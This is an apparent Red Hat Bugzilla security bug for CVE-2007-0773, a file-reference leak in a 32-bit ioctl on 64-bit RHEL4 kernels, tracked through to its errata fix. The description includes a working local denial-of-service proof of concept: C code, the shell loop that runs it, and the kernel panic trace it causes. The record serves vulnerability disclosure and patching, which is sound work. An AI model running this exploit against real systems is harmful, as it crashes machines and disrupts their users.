Bug 243252 - (CVE-2007-0773) CVE-2007-0773 lost fput in a 32-bit ioctl on 64-bit x86 systems
CVE-2007-0773 lost fput in a 32-bit ioctl on 64-bit x86 systems
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
x86_64 Linux
medium Severity medium
: ---
: ---
Assigned To: Jason Baron
Martin Jenner
impact=important,source=bugzilla,repo...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2007-06-08 06:06 EDT by Marcel Holtmann
Modified: 2016-05-20 10:41 EDT (History)
9 users (show)

See Also:
Fixed In Version: RHSA-2007-0488
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2007-06-25 14:05:13 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Marcel Holtmann 2007-06-08 06:06:03 EDT
SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that first part of
CVE-2005-3044 "fput in a 32-bit ioctl on 64-bit x86 systems" is still not fixed
in  RHEL4 kernel 2.6.9-42.0.8. As a result local users are able to cause a
denial of service.

The following patch fixes this problem in linux mainstream:
http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=35311d6478077f7bfe35c1c653193e658bf32686

The follwong script demonstrates the resource leakage:
[vvs@dhcp17-60 ~]$ uname -a
Linux dhcp17-60.qa.sw.ru 2.6.9-42.0.8.EL #1 Tue Jan 23 12:34:49 EST 2007 x86_64
x86_64 x86_64 GNU/Linux
[vvs@dhcp17-60 ~]$ id
uid=500(vvs) gid=500(vvs) groups=500(vvs) context=user_u:system_r:unconfined_t
[vvs@dhcp17-60 ~]$ cat tiocgdev.c
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define TIOCGDEV        _IOR('T',0x32, unsigned int)

int main(int argc, char *argv[])
{
        int fd, ret;

        fd = open(argv[0], O_RDONLY);
        if (fd < 0) {
                perror("open");
                return 1;
        }
        ret = ioctl(fd, TIOCGDEV, NULL);
        if (ret < 0) {
                perror("ioctl");
                return 1;
        }
        return 0;
}
[vvs@dhcp17-60 ~]$ gcc -m32 -o tiocgdev32 tiocgdev.c --static
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
528     0       24581
[vvs@dhcp17-60 ~]$ for i in `seq 1 10000` ; do ./tiocgdev32 &>/dev/null ; done
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
10452   0       24581

Exploit owerflows the file->f_count and crashes the node:

Unable to handle kernel NULL pointer dereference at 0000000000000038 RIP:
<ffffffff80199606>{vfs_getattr+24}
PML4 5cf1067 PGD 8765067 PMD 0
Oops: 0000 [1]
CPU 0
Modules linked in: md5 ipv6 parport_pc lp parport autofs4 sunrpc ds
yenta_socket pcmcia_core ipt_REJECT ipt_state ip_conntrack iptable_filter
ip_tables dm_mirror button battery ac uhci_hcd snd_ens1371 snd_rawmidi
snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc
snd_ac97_codec snd soundcore e1000 floppy ext3 jbd dm_mod mptscsih mptsas
mptspi mptfc mptscsi mptbase sd_mod scsi_mod
Pid: 3753, comm: tiocgdev32 Not tainted 2.6.9-42.0.8.EL
RIP: 0010:[<ffffffff80199606>] <ffffffff80199606>{vfs_getattr+24}
RSP: 0000:0000010008e69ea8  EFLAGS: 00010206
RAX: ffffffff80449cc0 RBX: 0000000000000000 RCX: 0000010008ec8148
RDX: 0000010008e69ef8 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000010008e69ef8 R08: 0000010008ec8140 R09: 00000000ffffd854
R10: 0000010008e68000 R11: 0000000000000000 R12: 0000010008e69ef8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000002a96a2d2a0(0000) GS:ffffffff80545480(0000) knlGS:00000000f7ff58e0
CS:  0010 DS: 002b ES: 002b CR0: 000000008005003b
CR2: 0000000000000038 CR3: 0000000000101000 CR4: 00000000000006e0
Process tiocgdev32 (pid: 3753, threadinfo 0000010008e68000, task
0000010009020030)
Stack: 0000010008ec8140 000001000929dcc0 00000000fffffff7 0000010008e69ef8
       0000000000000000 ffffffff80199738 00000000ffffd7a8 00000000ffffd854
       0000000000000000 ffffffff80127e9f
Call Trace:<ffffffff80199738>{vfs_fstat+41}
<ffffffff80127e9f>{sys32_fstat64+17}
       <ffffffff801c2587>{compat_sys_ioctl+906}
<ffffffff8018dbbb>{sys_write+69}
       <ffffffff80127991>{ia32_sysret+0}

Code: 4c 8b 66 38 ff 90 a0 01 00 00 85 c0 75 6e 49 8b 84 24 70 01
RIP <ffffffff80199606>{vfs_getattr+24} RSP <0000010008e69ea8>
CR2: 0000000000000038
 <0>Kernel panic - not syncing: Oops
Comment 1 Eric Sandeen 2007-06-08 12:53:20 EDT
Ok, so this is a dup of Bug 227978 for z-stream?

If so maybe Jeff should take it, since he did the original work in the other
bug?  I'm happy to ferry this in for z-stream, but it seems like "his" bug, so
I'll give him first carck at it. :)

-Eric
Comment 2 Eric Sandeen 2007-06-08 13:25:29 EDT
Talked with Jeff... over to him since he did the original work.

-Eric
Comment 5 Jason Baron 2007-06-12 11:35:07 EDT
committed in stream rhel‑4.5.z build 55.0.1
Comment 8 Red Hat Bugzilla 2007-06-25 14:05:13 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0488.html

Note You need to log in before you can comment on or make changes to this bug.